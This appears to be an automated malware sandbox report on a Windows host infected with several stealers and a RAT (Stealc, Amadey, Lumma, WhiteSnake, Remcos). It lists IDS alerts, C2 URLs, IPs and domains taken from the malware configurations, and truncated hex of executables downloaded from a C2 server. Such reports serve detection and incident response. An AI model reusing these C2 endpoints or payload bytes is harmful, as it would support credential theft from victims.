Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49815
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49845 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49868 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49869 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.4:49882 -> 147.124.221.201:8080
Source: Network traffic	Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.4:49882 -> 147.124.221.201:8080
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49887 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49799 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49893 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:52995 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:51086 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:59704 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:61705 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:53474 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49904 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49906 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49905 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49916 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49919 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:60407 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49930 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49931 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49937 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49950 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49944 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49943 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49957 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49967 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49964 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49983 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49973 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:51687 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:63730 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:55901 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:64899 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:59564 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49986 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49963 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49993 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:49992 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50002 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50004 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50003 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50015 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50009 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50016 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50023 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50022 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50035 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50036 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50048 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50042 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50051 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50056 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50062 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50070 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50065 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50081 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50080 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50090 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50092 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50094 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50096 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50102 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50104 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50093 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50100 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50103 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50098 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50097 -> 194.59.31.120:8452
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49906 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49906 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49916 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49931 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49992 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49992 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50003 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50003 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50002 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50042 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50062 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50080 -> 104.21.5.155:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: dpdnow.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: dpdnow.duckdns.org

Source: global traffic	TCP traffic: 192.168.2.4:49868 -> 194.59.31.120:8452
Source: global traffic	TCP traffic: 192.168.2.4:49882 -> 147.124.221.201:8080

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 03:12:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 03:12:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 03:12:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 03:12:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 